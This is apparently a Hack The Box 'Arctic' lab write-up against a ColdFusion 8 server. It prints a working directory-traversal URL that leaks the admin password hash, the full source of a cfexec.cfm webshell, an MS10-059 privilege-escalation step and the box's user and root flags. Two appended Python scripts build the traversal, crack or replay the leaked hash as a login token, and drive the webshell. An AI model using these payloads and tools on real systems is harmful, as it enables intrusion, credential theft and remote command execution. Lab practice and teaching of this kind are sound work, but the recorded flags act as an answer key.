10.10.10.11 - Arctic

Host Information
Operating System: Microsoft Windows Server 2008 R2 Standard (6.1.7600, build 7600)
Architecture: x64-based PC
Domain: HTB (standalone server, no logon server)
Installed Updates: none (Hotfix(s): N/A, see systeminfo under Post Exploitation)

Enumeration

TCP

nmap -sS -A -sV -n -Pn 10.10.10.11

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-25 14:24 EDT
Nmap scan report for 10.10.10.11
Host is up (0.066s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|WAP|phone
Running: iPXE 1.X, Linux 2.4.X|2.6.X, Sony Ericsson embedded OS
CPE: cpe:/o:ipxe:ipxe:1.0.0%2b cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz
OS details: iPXE 1.0.0+, Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1   ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 139.92 seconds

Note: the OS fingerprint (iPXE / Tomato / Sony Ericsson) is noise; as the warning says, nmap had no closed port to compare against. The msrpc banners and the systeminfo output below settle the host as Windows Server 2008 R2. Port 8500 is reported as "fmtp?" because nmap could not match the banner; it is in fact HTTP (see Other).

Other
HTTP found on 8500, running ColdFusion 8. Multiple vulns: authentication hash leak (directory traversal in the administrator login page), weak hash, remote file inclusion via Scheduled Tasks.

Empty template nodes (nothing recorded for this host): UDP, Web Services, Nikto, Dirb\DirBuster, WebDav, CMS, Other Services (SMB, SNMP, DB), Script Results, Network (IPConfig\IFConfig, Network Processes, ARP, DNS, Route), Running Processes (Process List), File System (Writeable Files\Directories, Directory List), Installed Applications, Scheduled Jobs (Scheduled Tasks), Goodies, Passwords, Hashes, Log Book, 10.11.1.

Exploitation

Service Exploited: HTTP via ColdFusion 8 (port 8500)
Vulnerability Type: Credential Leak > Weak Hash > RFI > Exploit
Description: Discovery of Vulnerability

Exploit Code Used

Credential leak: directory traversal in the locale parameter of the administrator login page reads the administrator password hash out of password.properties:

http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CColdFusion8%5Clib%5Cpassword.properties%00en

(%5C is a URL-encoded backslash; the %00 terminates the path before whatever the application appends to the locale value.)

RFI: after logging in to the administrator with the cracked hash, a Scheduled Task fetches the cfexec.cfm below from the attacker's web server and saves it under the webroot (C:\ColdFusion8\wwwroot\CFIDE\).

    <html>
    <body>
    Notes:<br><br>
    <ul>
      <li>Prefix DOS commands with "c:\windows\system32\cmd.exe /c <command>" or wherever cmd.exe is<br>
      <li>Options are, of course, the command line options you want to run
      <li>CFEXECUTE could be removed by the admin. If you have access to CFIDE/administrator you can re-enable it
    </ul>
    <p>
    <cfoutput>
    <table>
    <form method="POST" action="cfexec.cfm">
      <tr><td>Command:</td><td><input type=text name="cmd" size=50 <cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
      <tr><td>Options:</td><td><input type=text name="opts" size=50 <cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
      <tr><td>Timeout:</td><td><input type=text name="timeout" size=4 <cfif isdefined("form.timeout")>value="#form.timeout#"<cfelse>value="5"</cfif>></td></tr>
    </table>
    <input type=submit value="Exec">
    </form>
    <cfif isdefined("form.cmd")>
      <!--- cfsavecontent captures the process output so it can be echoed below --->
      <cfsavecontent variable="myVar">
        <cfexecute name="#Form.cmd#" arguments="#Form.opts#" timeout="#Form.timeout#"></cfexecute>
      </cfsavecontent>
      <pre>
      #myVar#
      </pre>
    </cfif>
    </cfoutput>
    </body>
    </html>

Command - c:\windows\system32\cmd.exe
Options - /c type C:\Users\tolis\Desktop\user.txt > C:\ColdFusion8\wwwroot\CFIDE\userlist.txt

Navigate to http://10.10.10.11:8500/CFIDE/userlist.txt and we have the user flag.

Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel

Post Exploitation

Host Information

C:\ColdFusion8\runtime\bin>systeminfo

Host Name:                 ARCTIC
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                55041-507-9857321-84451
Original Install Date:     22/3/2017, 11:09:45
System Boot Time:          28/3/2020, 3:52:57
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     1.023 MB
Available Physical Memory: 175 MB
Virtual Memory: Max Size:  2.047 MB
Virtual Memory: Available: 1.208 MB
Virtual Memory: In Use:    839 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.11

(The system locale is Greek, so the AM/PM markers in the original output came through as unreadable bytes and are omitted above. Thousands separators in the memory figures are dots for the same reason: 1.023 MB is 1023 MB.)

Users & Groups

Users

 Volume in drive C has no label.
 Volume Serial Number is F88F-4EA5

 Directory of C:\Users

22/03/2017  09:00 μμ    <DIR>          .
22/03/2017  09:00 μμ    <DIR>          ..
22/03/2017  08:10 μμ    <DIR>          Administrator
14/07/2009  06:57 πμ    <DIR>          Public
22/03/2017  09:00 μμ    <DIR>          tolis
               0 File(s)              0 bytes
               5 Dir(s)  33.184.288.768 bytes free

Groups: not recorded.

Priv Escalation

Windows-Exploit-Suggester against the systeminfo output above:

./windows-exploit-suggester.py --database 2020-03-26-mssb.xls --systeminfo /home/kali/Arctic/sysinfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important   <<<<<<<<<<<<<<<<<<<<<<<<
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

Service Exploited: Tracing Feature for Services (MS10-059)
Vulnerability Type: Local elevation of privilege. The PoC is kept in the windows-kernel-exploits repository, but per the bulletin title this is a flaw in the Tracing Feature for Services, not a kernel bug.
POC: https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059
Description: Discovery of Vulnerability: Windows-Exploit-Suggester (above). With zero hotfixes installed, every bulletin for 2008 R2 build 7600 is unpatched; MS10-059 was chosen because a standalone local EoP binary exists for it.
Exploit Code Used: MS10-059.exe from https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059

Proof\Local.txt File
☐ Screenshot with ifconfig\ipconfig
☐ Submit to OSCP Exam Panel

Proof\Flags\Other
USER - tolis - 02650d3a69a70780c302e146a6cb96f3
Root - ce65ceee66b2b5ebaff07e50508ffb90

Methodology

Network Scanning
☐ nmap -sn 10.11.1.*
☐ nmap -sL 10.11.1.*
☐ nbtscan -r 10.11.1.0/24
☐ smbtree
Software Versions
Potential Exploits

Individual Host Scanning
☐ nmap --top-ports 20 --open -iL iplist.txt
☐ nmap -sS -A -sV -O -p- ipaddress
☐ nmap -sU ipaddress

Service Scanning
WebApp
☐ Nikto
☐ dirb
☐ dirbuster
☐ wpscan
☐ dotdotpwn
☐ view source
☐ davtest\cadaver
☐ droopescan
☐ joomscan
☐ LFI\RFI Test
Linux\Windows
☐ snmpwalk -c public -v1 ipaddress 1
☐ smbclient -L //ipaddress
☐ showmount -e ipaddress port
☐ rpcinfo
☐ Enum4Linux
Anything Else
☐ nmap scripts (locate *nse* | grep servicename)
☐ hydra
☐ MSF Aux Modules
☐ Download the software

Exploitation
☐ Gather Version Numbers
☐ Searchsploit
☐ Default Creds
☐ Creds Previously Gathered
☐ Download the software

Post Exploitation
Linux
☐ linux-local-enum.sh
☐ linuxprivchecker.py
☐ linux-exploit-suggester.sh
☐ unix-privesc-check.py
Windows
☐ wpc.exe
☐ windows-exploit-suggester.py
☐ windows_privesc_check.py
☐ windows-privesc-check2.exe

Priv Escalation
☐ access internal services (portfwd)
☐ add account
Windows
☐ List of exploits
Linux
☐ sudo su
☐ KernelDB
☐ Searchsploit

Final
☐ Screenshot of IPConfig\WhoamI
☐ Copy proof.txt
☐ Dump hashes
☐ Dump SSH Keys
☐ Delete files
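The credential-leak step of the Exploitation section, worked through offline as an added example (this is not code from the notes). It builds the enter.cfm traversal URL exactly as used against 10.10.10.11, parses a password.properties file, checks the unsalted SHA-1 against a wordlist (the "weak hash" step), and goes one step beyond the notes: the ColdFusion 8 administrator login form computes HMAC-SHA1(salt, SHA1(password)) in JavaScript, so a leaked hash can be replayed as a login token without cracking it. The sample file, password, wordlist and salt are constructed for the example; the uppercase-hex convention of the token is an assumption to verify against the served login.cfm.

```python
"""Offline helpers for the ColdFusion 8 credential-leak step in the Arctic notes.

Added example, not code from the notes. Builds the enter.cfm traversal URL the
notes use, parses the leaked password.properties, checks the SHA-1 against a
wordlist (the "weak hash" step), and derives the token the CF8 administrator
login form computes client-side from the page salt and the password hash.
"""
import hashlib
import hmac
from urllib.parse import quote


def build_traversal_url(host, port, target, depth=8, suffix="en"):
    """Traversal URL for the administrator login page's locale parameter.

    `target` is a Windows path below the traversal root, e.g.
    r"ColdFusion8\\lib\\password.properties". Backslashes go out as %5C, the
    %00 cuts off whatever the application appends to the locale value, and
    `suffix` keeps the parameter shaped like a locale name.
    """
    traversal = "..%5C" * depth
    return (f"http://{host}:{port}/CFIDE/administrator/enter.cfm"
            f"?locale={traversal}{quote(target, safe='')}%00{suffix}")


def parse_password_properties(text):
    """Parse the Java-properties file CF8 keeps its administrator hash in (key=value lines)."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def sha1_hex(password):
    """Unsalted uppercase-hex SHA-1, the form the password= entry is stored in."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def crack_sha1(stored_hash, wordlist):
    """Return the wordlist entry whose SHA-1 equals stored_hash, or None.

    Unsalted SHA-1 is the "weak hash" of the notes: one hash computation per
    candidate, and precomputed tables exist for common passwords.
    """
    target = stored_hash.upper()
    for candidate in wordlist:
        if sha1_hex(candidate) == target:
            return candidate
    return None


def login_token(stored_hash, salt):
    """Value the CF8 login form posts as cfadminPassword.

    The form's JavaScript sends HMAC-SHA1(key=salt, msg=SHA1(password)) where
    salt is a hidden field served with login.cfm. With the stored SHA-1 in
    hand the token can be produced without cracking anything. Uppercase hex is
    assumed here; check the case the served login.cfm uses.
    """
    mac = hmac.new(salt.encode("utf-8"), stored_hash.upper().encode("utf-8"), hashlib.sha1)
    return mac.hexdigest().upper()


# Constructed sample in the layout of ColdFusion8\lib\password.properties; the
# password and hash are made up for this example, not the box's real ones.
DEMO_PASSWORD = "winter2017"
SAMPLE_PASSWORD_PROPERTIES = (
    "#Constructed sample, not the real file\n"
    "rdspassword=\n"
    f"password={sha1_hex(DEMO_PASSWORD)}\n"
    "encrypted=true\n"
)
WORDLIST = ["password", "admin", "coldfusion", "winter2017", "Summer2016"]


def demo(salt="1585151234567"):
    """Run the whole chain on the constructed sample and return the results."""
    props = parse_password_properties(SAMPLE_PASSWORD_PROPERTIES)
    stored = props["password"]
    return {
        "url": build_traversal_url("10.10.10.11", 8500, r"ColdFusion8\lib\password.properties"),
        "stored_hash": stored,
        "cracked": crack_sha1(stored, WORDLIST),
        "login_token": login_token(stored, salt),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The salt served by login.cfm is only valid for a short window, so the token has to be computed from a freshly fetched page and posted straight back; the function takes the salt as a string because that is how the hidden field arrives.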
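A driver for the cfexec.cfm webshell from the Exploitation section, added here as an example (not code from the notes). The form fields cmd, opts and timeout and the <pre> block around the cfexecute output come straight from the template above; the shell URL (/CFIDE/cfexec.cfm is assumed from where userlist.txt landed) and the sample response are constructed.

```python
"""Client for the cfexec.cfm webshell shown in the Arctic notes.

Added example, not from the notes. The form fields (cmd, opts, timeout) and
the <pre> block that wraps cfexecute's output come from the cfexec.cfm
template itself; the shell URL and the sample response below are constructed.
"""
import html
import re
import sys
from urllib.parse import urlencode
from urllib.request import Request, urlopen

CMD_EXE = r"c:\windows\system32\cmd.exe"


def dos_command(command):
    """Split a DOS command into the (cmd, opts) pair cfexec.cfm expects.

    cfexecute launches a binary, so shell built-ins such as `type` and `>`
    redirection only work when cmd.exe is the binary and the command is
    handed over as its /c argument, exactly as the notes do.
    """
    return CMD_EXE, "/c " + command


def cfexec_form(cmd, opts, timeout=5):
    """Form body for a POST to cfexec.cfm; timeout is in seconds."""
    return {"cmd": cmd, "opts": opts, "timeout": str(timeout)}


def parse_cfexec_output(page):
    """Extract the command output cfexec.cfm wraps in <pre>...</pre>.

    Returns None when no <pre> block is present, e.g. the bare GET form, or
    a ColdFusion error page when CFEXECUTE has been disabled by the admin.
    """
    m = re.search(r"<pre>(.*?)</pre>", page, re.S | re.I)
    if not m:
        return None
    return html.unescape(m.group(1)).strip()


def run(shell_url, command, timeout=5):
    """POST a DOS command to the webshell and return its output (network call)."""
    cmd, opts = dos_command(command)
    body = urlencode(cfexec_form(cmd, opts, timeout)).encode()
    req = Request(shell_url, data=body,
                  headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urlopen(req, timeout=timeout + 10) as resp:
        return parse_cfexec_output(resp.read().decode("utf-8", "replace"))


# Constructed response in the shape cfexec.cfm renders after a successful exec.
SAMPLE_RESPONSE = """<html><body>
Notes:<br><br>
<form method="POST" action="cfexec.cfm">...</form>
<pre>
arctic\\tolis
</pre>
</body></html>"""


if __name__ == "__main__":
    if len(sys.argv) >= 3:
        # e.g. python cfexec_client.py http://10.10.10.11:8500/CFIDE/cfexec.cfm whoami
        print(run(sys.argv[1], " ".join(sys.argv[2:])))
    else:
        print(parse_cfexec_output(SAMPLE_RESPONSE))
```

Output comes back inline in the <pre> block, so redirecting to a file under the webroot (as the notes do with userlist.txt) is only needed when the shell page itself is not rendering the result.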